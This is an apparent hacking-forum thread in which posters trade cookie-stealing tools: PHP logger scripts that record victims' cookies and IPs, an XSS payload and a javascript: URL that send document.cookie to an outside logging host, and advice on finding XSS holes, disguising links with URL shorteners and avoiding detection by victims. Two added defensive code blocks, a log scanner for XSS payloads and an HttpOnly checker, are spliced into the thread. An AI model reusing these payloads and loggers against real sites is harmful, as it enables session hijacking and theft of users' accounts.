
community cookie logger?


ghost's Avatar
0 0

I found this site –> http://ccl.whiteacid.org/ which apparently logs cookies. Tried it on a few mates; it doesn't really work, OR it does work and I've just not done it properly. Anyone who has ever used it know if it's any good? Or should I just screw that, stop being lazy and write my own one :s lol


ghost's Avatar
0 0

Write your own, it's damn fun :D I'll show you one of mine ;)


ghost's Avatar
0 0

Oh, that would be great if you would, mate :-)


ghost's Avatar
0 0

Well, here it goes..

```php
<?php
putenv("TZ=Europe/Oslo");
$ipLog="logS.html";

$ip = $_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS \of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
$port = $_SERVER['REMOTE_PORT'];
$cookie = $HTTP_GET_VARS["c"];

fputs($log, "
<p>---------------------------------------------------------------</p>
<b> Host:</b><i> $host </i><br> 
<b> Port:</b> $port <br> 
<b> Cookies:</b><font size='2'>  $cookie </font><br> 
<b> User-Agent:</b> $user_agent <br>
<b> Referer:</b> <a href='$referer'><font size='2' color='gray'>$referer</font></a> <br>
<b> IP:</b> <a href='http://$ip'><font size='2' color='gray'>$ip</font></a> - 
<a href='http://www.dnsstuff.com/tools/ipall.ch?ip=$ip&src=ShowIP'><font size='2' color='gray'>DNS-Ping</font></a><br>
<b> Date:</b> $date
");

?>
```

Note: the putenv("TZ=Europe/Oslo"); is used to print out my time zone, and yes, I did strike my IP with *'s :p

http://www.theprojects.org/dev/zone.txt

logS.html should look like this now:
http://i11.tinypic.com/4kde8lc.png

ghost's Avatar
0 0

Cookie loggers require an XSS hole in a site. Believe me, I thought all I had to do is get someone to go to a cookie logger and I would get all their cookies. I later learned that that's not how it works. You need to find an XSS hole, get your victim to click it, then you will get that person's cookies from whatever site you found the XSS in. Hope this helps.


ghost's Avatar
0 0

bigggnick wrote: Cookie loggers require an XSS hole in a site. Believe me, I thought all I had to do is get someone to go to a cookie logger and I would get all their cookies. I later learned that that's not how it works. You need to find an XSS hole, get your victim to click it, then you will get that person's cookies from whatever site you found the XSS in. Hope this helps.

You can just link to the cookie stealer, then make them click the link, or an image they can click, but the best way is to find an XSS hole in a GET variable, like, search.php?q="><script>blablalba</script> or even search.php?q="><script src="blabla.js">

Then, make a tinyurl to that page (http://vuln.com/search.php?q=">etc..) and make the victim open your tinyurl..

But if you find out you can execute JS in your avatar or profile, that'll be even better..

So you don't really need an XSS hole, just something that won't filter your link.. + document.cookie..
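
From the defending site's side, the reflected payloads described in this post show up in the web server's access log. The following added example (not code from any poster in this thread) scans constructed log lines for them; the log format, the sample lines and the `scanLog`/`fullyDecode` names are assumptions.

```javascript
// Added example: flag requests whose decoded query string carries script markup.
// Constructed access-log lines (Common Log Format); IPs are documentation ranges.
const SAMPLE_LOG = [
  '203.0.113.7 - - [01/Jan/2024:10:01:22 +0000] "GET /search.php?q=javascript+tutorial HTTP/1.1" 200 5120',
  '203.0.113.9 - - [01/Jan/2024:10:02:10 +0000] "GET /search.php?q=%22%3E%3Cscript%20src%3D%22blabla.js%22%3E HTTP/1.1" 200 5342',
  '198.51.100.4 - - [01/Jan/2024:10:03:41 +0000] "GET /search.php?q=%2522%253E%253Cscript%253Eblablalba%253C%252Fscript%253E HTTP/1.1" 200 5400',
  '198.51.100.8 - - [01/Jan/2024:10:04:05 +0000] "GET /index.php HTTP/1.1" 200 812',
  '198.51.100.8 - - [01/Jan/2024:10:05:17 +0000] "GET /search.php?q=%3Cscript%3Edocument.write(document.cookie)%3C%2Fscript%3E HTTP/1.1" 200 5391',
];

// Markers taken from the payload shapes quoted in the thread.
const PATTERNS = [
  { name: 'script-tag', re: /<\s*script\b/i },
  { name: 'document.cookie', re: /document\s*\.\s*cookie/i },
  { name: 'javascript-uri', re: /javascript\s*:/i },
];

// Percent-decode repeatedly (bounded) so single- and double-encoded input normalise alike.
function fullyDecode(s, maxRounds = 3) {
  let cur = s.replace(/\+/g, ' ');
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { break; } // malformed escape: keep current text
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Return { ip, path, hits } for a suspicious line, or null for a clean or unparsable one.
function scanLine(line) {
  const m = /^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/.exec(line);
  if (!m) return null;
  const [, ip, target] = m;
  const qpos = target.indexOf('?');
  if (qpos < 0) return null;
  const query = fullyDecode(target.slice(qpos + 1));
  const hits = PATTERNS.filter((p) => p.re.test(query)).map((p) => p.name);
  return hits.length ? { ip, path: target.slice(0, qpos), hits } : null;
}

function scanLog(lines) {
  return lines.map(scanLine).filter(Boolean);
}

console.log(scanLog(SAMPLE_LOG));
```

A hit only shows that markup was sent in a parameter; whether the page reflects it unescaped still has to be checked against the response.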


ghost's Avatar
0 0

I'm the author of the community cookie logger mentioned in the thread. Yes, you need to use it as you do any other cookie logger. You could always grab the source code (available in the /source/ folder) if you want to see how I made the page. The code is uglier than a downs syndrome sufferer that Satan built to while his bitch was refusing sex but I wrote the bugger in 24 hours.

To test it out, create an account and copy paste this into the address bar on this page:

```
javascript:i=document.createElement('img');i.setAttribute('style','display:none');i.src='http://ccl.whiteacid.org/log.php?XXXXXX'+document.cookie;document.body.appendChild(i);alert(i.src)
```

Replace XXXXXX with your account ID. Then log into your account; you've just stolen your own cookie.
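
A logger fed by `document.cookie` only receives cookies that were set without the `HttpOnly` attribute. The following added example (not part of the original post or of the community cookie logger's source) approximates what page script can read from a set of constructed `Set-Cookie` headers; the cookie names, values and function names are assumptions.

```javascript
// Added example: which cookies would a document.cookie read expose?
// Constructed Set-Cookie header values; names and values are placeholders.
const SAMPLE_SET_COOKIE = [
  'PHPSESSID=3f9a1c; path=/',
  'auth=tok123; Path=/; Secure; HttpOnly; SameSite=Lax',
  'theme=dark; Path=/; Max-Age=31536000',
  'remember=abc123; Path=/; httponly',
];

// Parse one Set-Cookie value into name, value and lower-cased attributes.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf('=');
  const name = eq < 0 ? '' : parts[0].slice(0, eq);
  const value = eq < 0 ? parts[0] : parts[0].slice(eq + 1);
  const attrs = {};
  for (const p of parts.slice(1)) {
    const i = p.indexOf('=');
    // Attribute names are case-insensitive; flag attributes have no value.
    attrs[(i < 0 ? p : p.slice(0, i)).toLowerCase()] = i < 0 ? true : p.slice(i + 1);
  }
  return { name, value, attrs };
}

// Approximate what document.cookie returns: every cookie without HttpOnly.
// Assumes all cookies match the page's path/domain and have not expired.
function documentCookieView(headers) {
  return headers.map(parseSetCookie)
    .filter((c) => !('httponly' in c.attrs))
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Report sensitive cookies (caller-supplied names) that page script can read.
function missingHttpOnly(headers, sensitiveNames) {
  const wanted = new Set(sensitiveNames);
  return headers.map(parseSetCookie)
    .filter((c) => wanted.has(c.name) && !('httponly' in c.attrs))
    .map((c) => c.name);
}

console.log(documentCookieView(SAMPLE_SET_COOKIE));
console.log(missingHttpOnly(SAMPLE_SET_COOKIE, ['PHPSESSID', 'auth', 'remember']));
```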


ghost's Avatar
0 0

This creates a 1x1 PNG image: unnoticeable (change the BG color) and no need for all the redirection crap. You need the GD library: a few free hosts do support it.

inject:

```html
<script>
document.write("<img src='http://localhost/image.php?data="+document.cookie+"'>");
</script>
```

php:

```php
<?php
$data = $_GET['data'];
header("Content-type: image/png");
$image = imagecreate(1,1);
imagecolorallocate($image,1,1,1);
imagepng($image);
imagedestroy($image);
$fp = fopen("misc.html","a");
fputs($fp, $data."<br>");
fclose($fp);
?>
```

on server:

chmod misc.html 777

WhiteAcid: if I take your source and integrate this method into an alternate method for the community, would you be willing to put it up?


ghost's Avatar
0 0

bigggnick wrote: Cookie loggers require an XSS hole in a site. Believe me, I thought all I had to do is get someone to go to a cookie logger and I would get all their cookies. I later learned that that's not how it works. You need to find an XSS hole, get your victim to click it, then you will get that person's cookies from whatever site you found the XSS in. Hope this helps.

Heh, it took me a while to get that too. Luckily, there's bucketloads of XSS holes still floating around myspace and other popular sites.

=D


ghost's Avatar
0 0

WhiteAcid wrote: By default it actually does redirect to a 1x1 transparent .gif (http://ccl.whiteacid.org/transp.gif)

Yeah, but isn't that a redirect? With that method you can actually post it as an image on the site. For example, your avatar.


ghost's Avatar
0 0

Yes you can since it redirects using HTTP headers, not HTML/JS code.


ghost's Avatar
0 0

Not applicable. It actually REDIRECTS you. When you end up on a new page with a new URL, and you're not an idiot, you get the club and patch your site/log out, leaving the attacker perhaps 15 seconds during which to do his work, you'll only get things done if you already have a script made to do them.

Now, if all your XSS attack is is a tiny white dot along with everything else on the page, and the URL stays the same, then it's not a big deal and fewer will notice.

For example, if I included an img right here, like so: :( then you wouldn't be suspicious

BUT, if your browser redirected to JUST a picture of that, you sure as hell better be confused and suspicious.


ghost's Avatar
0 0

Then choose to redirect to something else, like the main site page. It doesn't have to be an image.


ghost's Avatar
0 0

That's going a bit out of the way, IMHO. And it's still introducing a page reload that's unnecessary, plus forwarding traffic to a page it normally isn't forwarded to (although I guess that could be fixed in some cases). When the admin looks in their browser history after spending half a second longer staring at a blank white page or the page he isn't supposed to, or just a wrong URL, he's going to notice.